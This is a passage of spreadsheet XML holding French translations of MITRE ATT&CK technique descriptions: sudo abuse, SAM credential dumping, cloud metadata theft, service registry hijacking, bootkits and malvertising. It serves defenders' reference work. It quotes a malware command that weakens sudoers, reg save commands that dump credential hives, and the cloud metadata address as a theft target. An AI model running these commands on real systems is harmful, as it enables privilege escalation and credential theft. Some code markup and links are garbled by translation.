Le fichier sudoers, &lt;code&gt;/etc/sudoers&lt;/code&gt;, décrit quels utilisateurs peuvent exécuter quelles commandes et à partir de quels terminaux. Cela décrit également les commandes que les utilisateurs peuvent exécuter en tant qu’autres utilisateurs ou groupes. Cela fournit le principe du moindre privilège, de sorte que les utilisateurs s’exécutent avec leurs autorisations les plus faibles possibles la plupart du temps et n’accèdent à d’autres utilisateurs ou autorisations que si nécessaire, généralement en demandant un mot de passe. Cependant, le fichier sudoers peut également spécifier quand ne pas demander aux utilisateurs des mots de passe avec une ligne comme &lt;code&gt;user1 ALL=(ALL) NOPASSWD : ALL.&lt;/code&gt; (Référence : OSX. Cependant, des privilèges élevés sont nécessaires pour modifier ce fichier.
Les adversaires peuvent également abuser des mauvaises configurations de ces mécanismes pour élever les privilèges sans avoir besoin du mot de passe de l’utilisateur. Par exemple, l’horodatage de &lt;code&gt;/var/db/sudo&lt;/code&gt; peut être surveillé pour voir s’il se situe dans la plage &lt;code&gt;timestamp_timeout&lt;/code&gt;. Si c’est le cas, les logiciels malveillants peuvent exécuter des commandes sudo sans avoir à fournir le mot de passe de l’utilisateur. De plus, si &lt;code&gt;tty_tickets&lt;/code&gt; est désactivé, les adversaires peuvent le faire à partir de n’importe quel tty pour cet utilisateur.
Dans la nature, les logiciels malveillants &lt;code&gt;ont désactivé tty_tickets&lt;/code&gt; pour faciliter potentiellement la création de scripts en émettant &lt;code&gt;echo 'Defaults !tty_tickets' &gt;&gt; /etc/sudoers&lt;/code&gt;. (Citation : cybereason osx proton) Pour que ce changement soit pris en compte, le logiciel malveillant a également publié &lt;code&gt;killall Terminal&lt;/code&gt;. À partir de macOS Sierra, le fichier sudoers &lt;code&gt;a tty_tickets&lt;/code&gt; activé par défaut.
https://attack.mitre.org/techniques/T1548/003</t>
  </si>
  <si>
    <t>Un adversaire peut compresser ou chiffrer les données collectées avant l’exfiltration à l’aide d’une méthode personnalisée. Les adversaires peuvent choisir d’utiliser des méthodes d’archivage personnalisées, telles que le chiffrement avec XOR ou les chiffrements de flux mis en œuvre sans références de bibliothèque ou d’utilitaire externes. Des implémentations personnalisées d’algorithmes de compression bien connus ont également été utilisées. (Citation : ESET Sednit Partie 2)
https://attack.mitre.org/techniques/T1560/003</t>
  </si>
  <si>
    <t>Un adversaire peut tenter de modifier l’infrastructure de service de calcul d’un compte cloud pour échapper aux défenses. Une modification de l’infrastructure du service de calcul peut inclure la création, la suppression ou la modification d’un ou plusieurs composants tels que des instances de calcul, des machines virtuelles et des instantanés.
Les autorisations obtenues lors de la modification des composants de l’infrastructure peuvent contourner les restrictions qui empêchent l’accès à l’infrastructure existante. La modification des composants de l’infrastructure peut également permettre à un adversaire d’échapper à la détection et de supprimer les preuves de leur présence. (Citation : Mandiant M-Trends 2020)
https://attack.mitre.org/techniques/T1578</t>
  </si>
  <si>
    <t>Les adversaires peuvent compromettre les périphériques réseau tiers qui peuvent être utilisés lors du ciblage. Les périphériques réseau, tels que les routeurs de petits bureaux/bureaux à domicile (SOHO), peuvent être compromis lorsque l’objectif ultime de l’adversaire n’est pas [l’accès initial](https://attack.mitre.org/tactics/TA0001) à cet environnement, mais plutôt d’exploiter ces périphériques pour prendre en charge un ciblage supplémentaire.
Une fois qu’un adversaire a pris le contrôle, les périphériques réseau compromis peuvent être utilisés pour lancer des opérations supplémentaires, telles que l’hébergement de charges utiles pour des campagnes de [phishing](https://attack.mitre.org/techniques/T1566) (c’est-à-dire [Link Target](https://attack.mitre.org/techniques/T1608/005)) ou l’activation de l’accès requis pour exécuter des opérations [Content Injection](https://attack.mitre.org/techniques/T1659). Les adversaires peuvent également être en mesure de collecter des informations d’identification réutilisables (c’est-à-dire [Comptes valides](https://attack.mitre.org/techniques/T1078)) à partir de périphériques réseau compromis.
Les adversaires ciblent souvent les appareils de périphérie connectés à Internet et les appliances réseau associées qui ne prennent pas en charge les défenses robustes basées sur l’hôte. (Citation : Mandiant Fortinet Zero Day)(Citation : Cyberguerre câblée de la Russie)
Les périphériques réseau compromis peuvent être utilisés pour prendre en charge les activités ultérieures de [Command and Control](https://attack.mitre.org/tactics/TA0011), telles que [Hide Infrastructure](https://attack.mitre.org/techniques/T1665) via un réseau [Proxy](https://attack.mitre.org/techniques/T1090) et/ou [Botnet](https://attack.mitre.org/techniques/T1584/005). (Référence : Justice GRU 2024)
https://attack.mitre.org/techniques/T1584/008</t>
  </si>
  <si>
    <t>Les adversaires peuvent acheter des publicités en ligne qui peuvent être utilisées à mauvais escient pour distribuer des logiciels malveillants aux victimes. Les annonces peuvent être achetées pour planter et positionner favorablement des artefacts à des endroits spécifiques en ligne, par exemple en bonne place dans les résultats des moteurs de recherche. Ces publicités peuvent rendre plus difficile pour les utilisateurs de faire la distinction entre les résultats de recherche réels et les publicités. (Citation : spamhaus-malvertising) Les publicités achetées peuvent également cibler des publics spécifiques en utilisant les capacités du réseau publicitaire, ce qui permet de tirer parti de la confiance inhérente accordée aux moteurs de recherche et aux sites Web populaires. 
Les adversaires peuvent acheter des publicités et d’autres ressources pour aider à distribuer des artefacts contenant du code malveillant aux victimes. Les publicités achetées peuvent tenter d’usurper l’identité de marques connues ou de les usurper. Par exemple, ces publicités usurpées peuvent inciter les victimes à cliquer sur l’annonce, ce qui peut ensuite les envoyer vers un domaine malveillant qui peut être un clone de sites Web officiels contenant des versions trojanisées du logiciel annoncé. (Citation : Masquerads-Guardio)(Citation : FBI-search) Les efforts de l’adversaire pour créer des domaines malveillants et acheter des publicités peuvent également être automatisés à grande échelle afin de mieux résister aux efforts de nettoyage. (Citation : sentinelone-malvertising) 
Le malvertising peut être utilisé pour soutenir [Drive-by Target](https://attack.mitre.org/techniques/T1608/004) et [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), nécessitant potentiellement une interaction limitée de la part de l’utilisateur si l’annonce contient du code/des exploits qui infectent le navigateur Web du système cible. (Citation : BBC-malvertising)
Les adversaires peuvent également employer plusieurs techniques pour échapper à la détection par le réseau publicitaire. Par exemple, les adversaires peuvent acheminer dynamiquement les clics sur les annonces pour envoyer le trafic automatisé des robots d’indexation/application des règles vers des sites inoffensifs, tout en validant les cibles potentielles, puis en envoyant les victimes renvoyées à partir de clics réels sur des annonces vers des pages malveillantes. Ce vecteur d’infection peut donc rester caché du réseau publicitaire ainsi que de tout visiteur qui n’accède pas aux sites malveillants avec un identifiant valide en cliquant sur la publicité. (Citation : Masquerads-Guardio) D’autres astuces, telles que des fautes de frappe intentionnelles pour éviter la surveillance de la réputation de la marque, peuvent également être utilisées pour échapper à la détection automatique. (Citation : spamhaus-malvertising)
https://attack.mitre.org/techniques/T1583/008</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de découvrir les paramètres de groupe et d’autorisation. Ces informations peuvent aider les adversaires à déterminer quels comptes d’utilisateurs et quels groupes sont disponibles, l’appartenance des utilisateurs à des groupes particuliers et quels utilisateurs et groupes disposent d’autorisations élevées.
Les adversaires peuvent tenter de découvrir les paramètres d’autorisation de groupe de différentes manières. Ces données peuvent fournir à l’adversaire des informations sur l’environnement compromis qui peuvent être utilisées dans le cadre d’activités de suivi et de ciblage. (Citation : CrowdStrike BloodHound avril 2018)
https://attack.mitre.org/techniques/T1069</t>
  </si>
  <si>
    <t>Les adversaires peuvent cibler l’adresse e-mail de l’utilisateur pour collecter des informations sensibles. Les e-mails peuvent contenir des données sensibles, notamment des secrets commerciaux ou des informations personnelles, qui peuvent s’avérer précieuses pour les adversaires. Les e-mails peuvent également contenir des détails sur les opérations de réponse aux incidents en cours, ce qui peut permettre aux adversaires d’ajuster leurs techniques afin de maintenir la persistance ou d’échapper aux défenses. (Citation : TrustedSec OOB Communications)(Référence : CISA AA20-352A 2021) Les adversaires peuvent collecter ou transférer des e-mails à partir de serveurs de messagerie ou de clients.
https://attack.mitre.org/techniques/T1114</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’extraire des informations d’identification de la base de données SAM (Security Account Manager) soit par des techniques en mémoire, soit par le biais du registre Windows où la base de données SAM est stockée. Le SAM est un fichier de base de données qui contient les comptes locaux de l’hôte, généralement ceux trouvés avec la commande &lt;code&gt;net user&lt;/code&gt;. L’énumération de la base de données SAM nécessite un accès au niveau SYSTEM.
Un certain nombre d’outils peuvent être utilisés pour récupérer le fichier SAM grâce à des techniques en mémoire :
* pwdumpx.exe
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
* secretsdump.py
Alternativement, le SAM peut être extrait du registre avec Reg :
* &lt;code&gt;reg save HKLM\sam sam&lt;/code&gt;
* &lt;code&gt;reg save HKLM\système système&lt;/code&gt;
Creddump7 peut ensuite être utilisé pour traiter la base de données SAM localement afin de récupérer les hachages. (Citation : GitHub Creddump7)
Notes: 
* Le compte RID 500 est l’administrateur local intégré.
* Le RID 501 est le compte invité.
* Les comptes d’utilisateurs commencent avec un RID de 1 000+.
https://attack.mitre.org/techniques/T1003/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher dans les données WHOIS publiques des informations sur les victimes qui peuvent être utilisées lors du ciblage. Les données WHOIS sont stockées par les registres Internet régionaux (RIR) chargés de l’allocation et de l’attribution des ressources Internet telles que les noms de domaine. N’importe qui peut interroger les serveurs WHOIS pour obtenir des informations sur un domaine enregistré, telles que les blocs d’adresses IP attribués, les informations de contact et les serveurs de noms DNS. (Citation : WHOIS)
Les adversaires peuvent rechercher des données WHOIS pour recueillir des informations exploitables. Les acteurs de la menace peuvent utiliser des ressources en ligne ou des utilitaires de ligne de commande pour piller les données WHOIS à la recherche d’informations sur les victimes potentielles. Les informations provenant de ces sources peuvent révéler des opportunités pour d’autres formes de reconnaissance (ex : [Analyse active](https://attack.mitre.org/techniques/T1595) ou [Phishing pour obtenir des informations](https://attack.mitre.org/techniques/T1598)), l’établissement de ressources opérationnelles (ex : [Acquisition d’infrastructure](https://attack.mitre.org/techniques/T1583) ou [Compromission d’infrastructure](https://attack.mitre.org/techniques/T1584)), et/ou d’accès initial (ex : [Externe distant Services](https://attack.mitre.org/techniques/T1133) ou [Relation de confiance](https://attack.mitre.org/techniques/T1199)).
https://attack.mitre.org/techniques/T1596/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent modifier le microprogramme du système pour qu’il persiste sur les systèmes. Le BIOS (Basic Input/Output System) et l’interface UEFI (Unified Extensible Firmware Interface) ou EFI (Extensible Firmware Interface) sont des exemples de microprogramme système qui fonctionnent comme l’interface logicielle entre le système d’exploitation et le matériel d’un ordinateur. (Citation : BIOS de Wikipédia)(Citation : Wikipédia UEFI)(Citation : À propos de l’UEFI)
Les microprogrammes système tels que le BIOS et l’EFI sont à la base des fonctionnalités d’un ordinateur et peuvent être modifiés par un adversaire pour effectuer ou participer à des activités malveillantes. Il est possible d’écraser le micrologiciel du système, ce qui peut donner à des adversaires sophistiqués un moyen d’installer des mises à jour de microprogramme malveillantes comme moyen de persistance sur un système qui peut être difficile à détecter.
https://attack.mitre.org/techniques/T1542/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher des sites Web appartenant à la victime à la recherche d’informations qui peuvent être utilisées lors du ciblage. Les sites Web appartenant aux victimes peuvent contenir divers détails, notamment les noms des services ou des divisions, les emplacements physiques et des données sur les employés clés, comme les noms, les rôles et les coordonnées (p. ex. : [Adresses e-mail](https://attack.mitre.org/techniques/T1589/002)). Ces sites peuvent également contenir des détails mettant en évidence les opérations et les relations commerciales. (Citation : Fuite Comparitech)
Les adversaires peuvent effectuer des recherches sur des sites Web appartenant à des victimes pour recueillir des informations exploitables.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[Compromission de comptes](https://attack.mitre.org/techniques/T1586)), et/ou d’accès initial (ex : [Trusted Relation](https://attack.mitre.org/techniques/T1199) ou [Hameçonnage](https://attack.mitre.org/techniques/T1566)).
En plus de naviguer manuellement sur le site Web, les adversaires peuvent tenter d’identifier des répertoires ou des fichiers cachés qui pourraient contenir des informations sensibles supplémentaires ou des fonctionnalités vulnérables. Ils peuvent le faire par le biais d’activités automatisées telles que [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003), ainsi qu’en exploitant des fichiers tels que sitemap.xml et robots.txt. (Citation : Perez sitemap XML 2023)(Citation : Registre des robots TXT 2015)
https://attack.mitre.org/techniques/T1594</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de trouver des groupes de cloud et des paramètres d’autorisation. La connaissance des groupes d’autorisations cloud peut aider les adversaires à déterminer les rôles particuliers des utilisateurs et des groupes au sein d’un environnement, ainsi que les utilisateurs associés à un groupe particulier.
Avec l’accès authentifié, il existe plusieurs outils qui peuvent être utilisés pour trouver des groupes d’autorisations. L’applet de commande &lt;code&gt;PowerShell Get-MsolRole&lt;/code&gt; peut être utilisée pour obtenir des rôles et des groupes d’autorisations pour les comptes Exchange et Office 365 (Référence : Microsoft Msolrole) (Référence : GitHub Raindance).
Azure CLI (AZ CLI) et l’API du fournisseur d’identité Google Cloud fournissent également des interfaces permettant d’obtenir des groupes d’autorisations. La commande &lt;code&gt;az ad user get-member-groups&lt;/code&gt; répertorie les groupes associés à un compte d’utilisateur pour Azure, tandis que le point de terminaison &lt;code&gt;d’API GET https://cloudidentity.googleapis.com/v1/groups&lt;/code&gt; répertorie les ressources de groupe disponibles pour un utilisateur pour Google. (Citation : Microsoft AZ CLI)(Citation : Black Hills Red Teaming MS AD Azure, 2018)(Citation : Documentation de l’API Google Cloud Identity) Dans AWS, les commandes « ListRolePolicies » et « ListAttachedRolePolicies » permettent aux utilisateurs d’énumérer les stratégies attachées à un rôle. (Citation : Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)
Les adversaires peuvent tenter de répertorier les listes de contrôle d’accès des objets afin de déterminer le propriétaire et d’autres comptes ayant accès à l’objet, par exemple, via l’API AWS &lt;code&gt;GetBucketAcl&lt;/code&gt; (citation : AWS Get Bucket ACL). À l’aide de ces informations, un adversaire peut cibler des comptes disposant d’autorisations sur un objet donné ou exploiter des comptes qu’il a déjà compromis pour accéder à l’objet.
https://attack.mitre.org/techniques/T1069/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent exécuter leurs propres charges utiles malveillantes en détournant les entrées de registre utilisées par les services. Les adversaires peuvent utiliser des failles dans les autorisations des clés de registre liées aux services pour rediriger de l’exécutable spécifié à l’origine vers un exécutable qu’ils contrôlent, afin de lancer leur propre code au démarrage d’un service. Windows stocke les informations de configuration du service local dans le registre sous &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services&lt;/code&gt;. Les informations stockées sous les clés de registre d’un service peuvent être manipulées pour modifier les paramètres d’exécution d’un service à l’aide d’outils tels que le contrôleur de service, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001) ou [Reg](https://attack.mitre.org/software/S0075). L’accès aux clés de registre est contrôlé par le biais de listes de contrôle d’accès et d’autorisations utilisateur. (Citation : Sécurité de la clé de registre)(Citation : malware_hides_service)
Si les autorisations pour les utilisateurs et les groupes ne sont pas correctement définies et ne permettent pas l’accès aux clés de registre d’un service, les adversaires peuvent modifier le binPath/ImagePath du service pour pointer vers un autre exécutable sous leur contrôle. Lorsque le service démarre ou est redémarré, le programme contrôlé par l’adversaire s’exécute, ce qui permet à l’adversaire d’établir la persistance et/ou l’élévation de privilèges vers le contexte de compte sous lequel le service est configuré pour s’exécuter (compte local/de domaine, SYSTEM, LocalService ou NetworkService).
Les adversaires peuvent également modifier d’autres clés de registre dans l’arborescence du registre du service. Par exemple, la touche &lt;code&gt;FailureCommand&lt;/code&gt; peut être modifiée afin que le service soit exécuté dans un contexte élevé chaque fois qu’il échoue ou qu’il est intentionnellement endommagé. (Citation : Collectionneurs liés au Kansa Service)(Citation : Faiblesse des permanentes du registre des tweets)
La clé &lt;code&gt;Performance&lt;/code&gt; contient le nom de la DLL de performance d’un service de pilote et les noms de plusieurs fonctions exportées dans la DLL. (Référence : microsoft_services_registry_tree) Si la clé &lt;code&gt;de performance&lt;/code&gt; n’est pas déjà présente et si un utilisateur contrôlé par l’adversaire dispose de l’autorisation &lt;code&gt;Créer une sous-clé&lt;/code&gt;, les adversaires peuvent créer la clé &lt;code&gt;de performance&lt;/code&gt; dans l’arborescence du registre du service pour pointer vers une DLL malveillante. (Référence : insecure_reg_perms)
Les adversaires peuvent également ajouter la clé &lt;code&gt;Parameters&lt;/code&gt;, qui stocke des données spécifiques au pilote, ou d’autres sous-clés personnalisées pour leurs services malveillants afin d’établir la persistance ou d’activer d’autres activités malveillantes. (Référence : microsoft_services_registry_tree)(Référence : troj_zegost) De plus, si des adversaires lancent leurs services malveillants à l’aide de svchost.exe, le fichier du service peut être identifié à l’aide &lt;code&gt;de HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\servicename\Parameters\ServiceDll&lt;/code&gt;. (Citation : malware_hides_service)
https://attack.mitre.org/techniques/T1574/011</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher dans les données DNS des informations sur les victimes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adversaires peuvent rechercher des données DNS pour recueillir des informations exploitables. Les acteurs malveillants peuvent interroger directement les serveurs de noms d’une organisation cible ou effectuer des recherches dans des référentiels centralisés de réponses aux requêtes DNS enregistrées (appelées DNS passifs). (Citation : benne à ordures DNS)(Citation : Circl DNS passif) Les adversaires peuvent également rechercher et cibler les erreurs de configuration/fuites DNS qui révèlent des informations sur les réseaux internes. Les informations provenant de ces sources peuvent révéler des possibilités pour d’autres formes de reconnaissance (ex : [Rechercher des sites Web appartenant à la victime](https://attack.mitre.org/techniques/T1594) ou [Rechercher des sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593)), d’établir des ressources opérationnelles (ex : [Acquérir l’infrastructure](https://attack.mitre.org/techniques/T1583) ou [Compromettre l’infrastructure](https://attack.mitre.org/techniques/T1584)), et/ou un accès initial (ex : [Externe à distance Services](https://attack.mitre.org/techniques/T1133) ou [Relation de confiance](https://attack.mitre.org/techniques/T1199)).
https://attack.mitre.org/techniques/T1596/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent cibler des fonctionnalités gourmandes en ressources des applications pour provoquer un déni de service (DoS), privant ainsi ces applications de leur disponibilité. Par exemple, des fonctionnalités spécifiques dans les applications Web peuvent être très gourmandes en ressources. Des requêtes répétées adressées à ces fonctionnalités peuvent épuiser les ressources système et refuser l’accès à l’application ou au serveur lui-même. (Citation : Arbor AnnualDoSreport janvier 2018)
https://attack.mitre.org/techniques/T1499/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent manipuler les dépendances logicielles et les outils de développement avant qu’ils ne soient reçus par un consommateur final dans le but de compromettre les données ou le système. Les applications dépendent souvent de logiciels externes pour fonctionner correctement. Les projets open source populaires qui sont utilisés comme dépendances dans de nombreuses applications peuvent être ciblés comme moyen d’ajouter du code malveillant aux utilisateurs de la dépendance. (Citation : Compromis NPM de Trendmicro)  
Le ciblage peut être spécifique à un ensemble de victimes souhaitées ou peut être distribué à un large éventail de consommateurs, mais ne passer qu’à des tactiques supplémentaires visant des victimes spécifiques.
https://attack.mitre.org/techniques/T1195/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent acheter et/ou voler des certificats SSL/TLS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Les adversaires peuvent acheter ou voler des certificats SSL/TLS pour poursuivre leurs opérations, telles que le chiffrement du trafic C2 (ex : [Cryptographie asymétrique](https://attack.mitre.org/techniques/T1573/002) avec [Protocoles Web](https://attack.mitre.org/techniques/T1071/001)) ou même l’activation de [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) si le certificat est approuvé ou ajouté d’une autre manière à la racine de confiance (c’est-à-dire [Installer le certificat racine]( https://attack.mitre.org/techniques/T1553/004)). L’achat de certificats numériques peut être effectué à l’aide d’une organisation de façade ou à l’aide d’informations volées à une entité précédemment compromise qui permettent à l’adversaire de valider auprès d’un fournisseur de certificats en tant qu’entité telle qu’elle est dans le même temps. Les adversaires peuvent également voler des documents de certificat directement auprès d’un tiers compromis, y compris auprès des autorités de certification. (Citation : DiginotarCompromise) Les adversaires peuvent enregistrer ou détourner des domaines pour lesquels ils achèteront ultérieurement un certificat SSL/TLS.
Il existe des autorités de certification qui permettent aux adversaires d’acquérir gratuitement des certificats SSL/TLS, tels que des certificats de validation de domaine. (Citation : FAQ sur Let’s Encrypt)
Après avoir obtenu un certificat numérique, un adversaire peut ensuite installer ce certificat (voir [Installer un certificat numérique](https://attack.mitre.org/techniques/T1608/003)) sur l’infrastructure sous son contrôle.
https://attack.mitre.org/techniques/T1588/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent configurer leurs propres serveurs DNS (Domain Name System) qui peuvent être utilisés lors du ciblage. Au cours de l’activité post-compromission, les adversaires peuvent utiliser le trafic DNS pour diverses tâches, notamment pour la commande et le contrôle (ex : [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Au lieu de détourner les serveurs DNS existants, les adversaires peuvent choisir de configurer et d’exécuter leurs propres serveurs DNS pour soutenir les opérations.
En exécutant leurs propres serveurs DNS, les adversaires peuvent avoir plus de contrôle sur la façon dont ils administrent le trafic DNS C2 côté serveur ([DNS](https://attack.mitre.org/techniques/T1071/004)). En contrôlant un serveur DNS, les adversaires peuvent configurer des applications DNS pour fournir des réponses conditionnelles aux logiciels malveillants et, généralement, disposer d’une plus grande flexibilité dans la structure du canal C2 basé sur DNS. (Citation : Unit42 DNS mars 2019)
https://attack.mitre.org/techniques/T1583/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent effacer ou corrompre les données brutes du disque sur des systèmes spécifiques ou en grand nombre dans un réseau pour interrompre la disponibilité des ressources système et réseau. Avec un accès direct en écriture à un disque, les adversaires peuvent tenter d’écraser des parties des données du disque. Les adversaires peuvent choisir d’effacer des parties arbitraires des données du disque et/ou d’effacer les structures de disque comme l’enregistrement de démarrage principal (MBR). Une tentative d’effacement complet de tous les secteurs du disque peut être tentée.
Pour maximiser l’impact sur l’organisation cible dans les opérations où l’interruption de la disponibilité à l’échelle du réseau est l’objectif, les programmes malveillants utilisés pour effacer les disques peuvent avoir des fonctionnalités de type ver pour se propager sur un réseau en exploitant des techniques supplémentaires telles que [Comptes valides](https://attack.mitre.org/techniques/T1078), [Vidage des informations d’identification du système d’exploitation](https://attack.mitre.org/techniques/T1003) et [Partages SMB/Windows Admin](https://attack.mitre.org/techniques/T1021/002). (Citation : Logiciel malveillant destructeur Novetta Blockbuster)
Sur les périphériques réseau, les adversaires peuvent effacer les fichiers de configuration et d’autres données du périphérique à l’aide de commandes telles que « effacer » (https://attack.mitre.org/techniques/T1059/008 de l’interface de ligne de commande [Network Device CLI](. (Référence : erase_cmd_cisco)
https://attack.mitre.org/techniques/T1561</t>
  </si>
  <si>
    <t>Les adversaires peuvent communiquer à l’aide du protocole de couche application DNS (Domain Name System) pour éviter la détection/le filtrage du réseau en se fondant dans le trafic existant. Les commandes adressées au système distant, et souvent les résultats de ces commandes, seront incorporés dans le trafic de protocole entre le client et le serveur. 
Le protocole DNS remplit une fonction administrative dans les réseaux informatiques et peut donc être très courant dans les environnements. Le trafic DNS peut également être autorisé avant même que l’authentification réseau ne soit terminée. Les paquets DNS contiennent de nombreux champs et en-têtes dans lesquels les données peuvent être dissimulées. Souvent connu sous le nom de tunneling DNS, les adversaires peuvent abuser du DNS pour communiquer avec les systèmes sous leur contrôle au sein d’un réseau victime tout en imitant le trafic normal et attendu. (Citation : Tunneling DNS PAN)(Citation : Medium DnsTunneling)
https://attack.mitre.org/techniques/T1071/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’accéder à l’API Cloud Instance Metadata pour collecter des informations d’identification et d’autres données sensibles.
La plupart des fournisseurs de services cloud prennent en charge une API de métadonnées d’instance cloud, qui est un service fourni aux instances virtuelles en cours d’exécution qui permet aux applications d’accéder aux informations sur l’instance virtuelle en cours d’exécution. Les informations disponibles incluent généralement le nom, le groupe de sécurité et des métadonnées supplémentaires, y compris des données sensibles telles que des informations d’identification et des scripts UserData qui peuvent contenir des secrets supplémentaires. L’API de métadonnées d’instance est fournie à titre pratique pour faciliter la gestion des applications et est accessible à toute personne pouvant accéder à l’instance. (Référence : API de métadonnées d’instance AWS) Une API de métadonnées cloud a été utilisée dans au moins une compromission de haut niveau. (Citation : Krebs Capital One, août 2019)
Si des adversaires sont présents sur l’instance virtuelle en cours d’exécution, ils peuvent interroger directement l’API de métadonnées d’instance pour identifier les informations d’identification qui permettent d’accéder à des ressources supplémentaires. De plus, les adversaires peuvent exploiter une vulnérabilité SSRF (Server-Side Request Forgery) dans un proxy Web public qui leur permet d’accéder aux informations sensibles via une requête adressée à l’API de métadonnées d’instance. (Citation : API de métadonnées d’instance RedLock 2018)
La norme de facto pour les fournisseurs de services cloud est d’héberger l’API de métadonnées d’instance à l’adresse &lt;code&gt;http[ :]//169.254.169.254&lt;/code&gt;.
https://attack.mitre.org/techniques/T1552/005</t>
  </si>
  <si>
    <t>Un adversaire disposant d’un accès root peut collecter des informations d’identification en lisant la mémoire de « securityd ». 'Securityd' est un service/démon responsable de la mise en œuvre de protocoles de sécurité tels que le cryptage et l’autorisation. (Citation : Apple Dev SecurityD) Un adversaire privilégié peut être en mesure d’analyser la mémoire de « securityd » pour trouver la séquence de clés correcte afin de déchiffrer le trousseau de connexion de l’utilisateur. Cela peut fournir à l’adversaire divers mots de passe en texte brut, tels que ceux des utilisateurs, du WiFi, de la messagerie, des navigateurs, des certificats, des notes sécurisées, etc. (Citation : OS X Keychain)
Dans OS X antérieur à El Capitan, les utilisateurs disposant d’un accès root peuvent lire les mots de passe du trousseau en texte brut des utilisateurs connectés, car l’implémentation du trousseau d’Apple permet de mettre en cache ces informations d’identification afin que les utilisateurs ne soient pas invités à saisir leurs mots de passe à plusieurs reprises. (Citation : Porte-clés OS X)(citation : externe à DA, à la manière d’OS X) L’utilitaire « sécurisé » d’Apple prend le mot de passe de connexion de l’utilisateur, le crypte avec PBKDF2 et stocke cette clé principale en mémoire. Apple utilise également un ensemble de clés et d’algorithmes pour chiffrer le mot de passe de l’utilisateur, mais une fois la clé principale trouvée, un adversaire n’a qu’à itérer sur les autres valeurs pour déverrouiller le mot de passe final. (Citation : Porte-clés OS X)
https://attack.mitre.org/techniques/T1555/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent recueillir des informations sur les paramètres de stratégie de groupe afin d’identifier les chemins d’accès à l’élévation des privilèges, les mesures de sécurité appliquées au sein d’un domaine et de découvrir des modèles dans les objets du domaine qui peuvent être manipulés ou utilisés pour se fondre dans l’environnement. La stratégie de groupe permet une gestion centralisée des paramètres de l’utilisateur et de l’ordinateur dans Active Directory (AD). Les objets de stratégie de groupe (GPO) sont des conteneurs pour les paramètres de stratégie de groupe composés de fichiers stockés dans un chemin d’accès réseau prévisible '\&lt;DOMAIN&gt;\SYSVOL\&lt;DOMAIN&gt;\Policies\'.( Citation : Principes de base de la politique de groupe TechNet (Citation : ADSecurity GPO Persistence 2016)
Les adversaires peuvent utiliser des commandes telles que &lt;code&gt;gpresult&lt;/code&gt; ou diverses fonctions PowerShell accessibles publiquement, telles que &lt;code&gt;Get-DomainGPO&lt;/code&gt; et &lt;code&gt;Get-DomainGPOLocalGroup&lt;/code&gt;, pour collecter des informations sur les paramètres de stratégie de groupe. (Citation : Microsoft gpresult)(Citation : Github PowerShell Empire) Les adversaires peuvent utiliser ces informations pour façonner des comportements ultérieurs, notamment pour déterminer les chemins d’attaque potentiels au sein du réseau cible, ainsi que les possibilités de manipuler les paramètres de stratégie de groupe (c’est-à-dire [Modification de la politique de domaine ou de locataire](https://attack.mitre.org/techniques/T1484)) à leur avantage.
https://attack.mitre.org/techniques/T1615</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser des bootkits pour persister sur les systèmes. Les bootkits résident à une couche inférieure au système d’exploitation et peuvent rendre difficile l’exécution d’une correction complète, à moins qu’une organisation ne soupçonne qu’un tel kit a été utilisé et ne puisse agir en conséquence.
Un bootkit est une variante d’un logiciel malveillant qui modifie les secteurs d’amorçage d’un disque dur, y compris le Master Boot Record (MBR) et le Volume Boot Record (VBR). (Citation : Mandiant M Trends 2016) Le MBR est la section du disque qui est chargée en premier après l’initialisation du matériel par le BIOS. Il s’agit de l’emplacement du chargeur de démarrage. Un adversaire qui dispose d’un accès brut au lecteur de démarrage peut écraser cette zone, détournant l’exécution au démarrage du chargeur de démarrage normal vers le code de l’adversaire. (Citation : Lau 2011)
Le MBR transmet le contrôle du processus de démarrage au VBR. Comme dans le cas de MBR, un adversaire qui dispose d’un accès brut au lecteur de démarrage peut écraser le VBR pour détourner l’exécution au démarrage vers le code adversaire.
https://attack.mitre.org/techniques/T1542/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher des supports amovibles connectés sur des ordinateurs qu’ils ont compromis pour trouver des fichiers qui les intéressent. Les données sensibles peuvent être collectées à partir de n’importe quel support amovible (lecteur de disque optique, clé USB, etc.) connecté au système compromis avant l’exfiltration. Des shells de commande interactifs peuvent être utilisés, et des fonctionnalités communes à [cmd](https://attack.mitre.org/software/S0106) peuvent être utilisées pour collecter des informations. 
Certains adversaires peuvent également utiliser [Collecte automatisée](https://attack.mitre.org/techniques/T1119) sur des supports amovibles.
https://attack.mitre.org/techniques/T1025</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser de l’exécution de code malveillant mavinject.exe au proxy. Mavinject.exe s’agit de l’injecteur de virtualisation d’applications Microsoft, un utilitaire Windows qui peut injecter du code dans des processus externes dans le cadre de la virtualisation d’applications Microsoft (App-V). (Citation : LOLBAS Mavinject)
